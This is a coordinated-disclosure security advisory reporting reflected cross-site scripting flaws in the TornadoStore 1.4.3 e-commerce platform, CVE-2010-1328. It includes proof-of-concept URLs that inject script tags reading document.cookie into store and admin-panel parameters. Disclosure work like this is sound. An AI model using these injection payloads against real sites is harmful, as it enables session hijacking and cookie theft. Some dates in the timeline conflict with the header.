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Multiple XSS in TornadoStore 1.4.3

2010-06-2900:00:00
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               Multiple XSS in TornadoStore 1.4.3
  1. Advisory Information

Title: Multiple XSS in TornadoStore 1.4.3
Advisory ID: BONSAI-2010-0107
Advisory URL:
http://www.bonsai-sec.com/research/vulnerabilities/tornadostore-multiple-xss-0107.php
Date published: 2010-06-29
Vendors contacted: TornadoStore
Release mode: Coordinated release

  1. Vulnerability Information

Class: Multiple Cross Site Scripting (XSS)
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2010-1328

  1. Software Description

TornadoStoreΠ²β€žΡž is an ecommerce platform. The objective is to solve integrally
the commercialization of products and services of companies using an online
payment system. [0].

  1. Vulnerability Description

Cross-Site Scripting attacks are a type of injection problem, in which
malicious scripts are injected into the otherwise benign and trusted web sites.
Cross-site scripting (XSS) attacks occur when an attacker uses a web
application to send malicious code, generally in the form of a browser side
script, to a different end user. Flaws that allow these attacks to succeed are
quite widespread and occur anywhere a web application uses input from a user
in the output it generates without validating or encoding it.

For additional information, please read [1].

  1. Vulnerable packages

Version <= 1.4.3

  1. Non-vulnerable packages

TornadoStore developers informed us that all users should upgrade to the latest
version of TornadoStore, which fixes this vulnerability. More information to be
found here:
http://www.tornadostore.com

  1. Credits

This vulnerability was discovered by Lucas Apa ( lucas -at- bonsai-sec.com ).

  1. Technical Description

8.1 A Reflected Cross Site Scripting vulnerability was found in the
"tipo" and "destino" variables within the 'Services' section
and "rubro", "arti" on 'Products' section.
This is because the application does not properly sanitise
the users input. The vulnerability can be triggered by clicking on the
following URL:

http://www.example.com/login_registrese.php3?tipo=bonsai&quot;/&gt;&lt;script&gt;alert&#40;document.cookie&#41;&lt;/script&gt;&amp;destino=ordenes_pago.php3

http://www.example.com/login_registrese.php3?destino=cliente_ctacte.php3&quot;&lt;script&gt;alert&#40;document.cookie&#41;&lt;/script&gt;

http://www.example.com/precios.php3?pbegin=0&amp;subrubro=15&amp;rubro=4&quot;&lt;/a&gt;&lt;script&gt;alert&#40;document.cookie&#41;&lt;/script&gt;&quot;&amp;expand=SI&amp;familia=&amp;marca=&amp;campoorden=nArtPre&amp;vertodos=ALL

http://www.example.com/recomenda_articulo.php3?arti=002&quot;&gt;&lt;script&gt;alert&#40;document.cookie&#41;&lt;/script&gt;

8.2 A Reflected Cross Site Scripting vulnerability was found in the
TornadoStore Administration Panel. In "descrip" and "tit" variables
within the 'e-Commerce' Section. This could lead to admin session hijacking.

http://www.example.com/control/abm_det.php3?db=ts_143&amp;tabla=profile&amp;id=cDefSec&#37;3DMAIN&#37;2CcDefKey&#37;3DMAIL_PEDIDO_TEMPRANO&#37;2CcSis&#37;3Ddemo_143&amp;tabla_det=&amp;tit=Par&#37;E1metros&#37;20del&#37;20sitio&amp;pkmapped=&amp;ira=&amp;pagina=1&amp;det_order=&amp;det_ordor=&amp;txtBuscar=&amp;vars=display_text_chars=45,display_text_lines=1&amp;where=cDefSec=&#37;27MAIN&#37;27&amp;whereMaster=cDefSec=&#37;27MAIN&#37;27&amp;descrip=&quot;&lt;script&gt;alert&#40;document.cookie&#41;&lt;/script&gt;&lt;a
href="

http://www.example.com/control/abm_list.php3?db=ts_143&amp;tabla=delivery_courier&amp;tabla_det=delivery_costo&amp;order=&amp;ordor=&amp;tit=&lt;/span&gt;&lt;/td&gt;&lt;script&gt;alert&#40;document.cookie&#41;&lt;/script&gt;&amp;transporte=&amp;ira=&amp;pagina=1&amp;det_order=nDeCSer&amp;det_ordor=asc&amp;txtBuscar=&amp;vars=&amp;where=

http://www.example.com/control/abm_det.php3?db=ts_143&amp;tabla=usuario&amp;tit=&lt;/span&gt;&lt;/td&gt;&lt;script&gt;alert&#40;document.cookie&#41;&lt;/script&gt;

  1. Report Timeline

    • 2010-02-02:
      Vulnerabilities were identified.

    • 2010-02-08:
      Vendor confirmed these vulnerabilities.

    • 2010-02-16:
      Vendor contacted for an approximate fix release date. No specific answer given.

    • 2010-03-10:
      Vendor fixed these vulnerabilities. No specific answer given.

    • 2010-04-12:
      Vendor fixed this issue.

    • 2010-05-29:
      The advisory BONSAI-2010-0107 is published.

  2. References

[0] http://www.tornadostore.com
[1] http://www.owasp.org/index.php/Cross_site_scripting
[2] http://www.bonsai-sec.com/blog/

  1. About Bonsai

Bonsai is a company involved in providing professional computer information security services.
Currently a sound growth company, since its foundation in early 2009 in Buenos Aires, Argentina,
we are fully committed to quality service, and focused on our customers' real needs.

  1. Disclaimer

The contents of this advisory are copyright (c) 2010 Bonsai Information Security, and may be
distributed freely provided that no fee is charged for this distribution and proper credit is
given.

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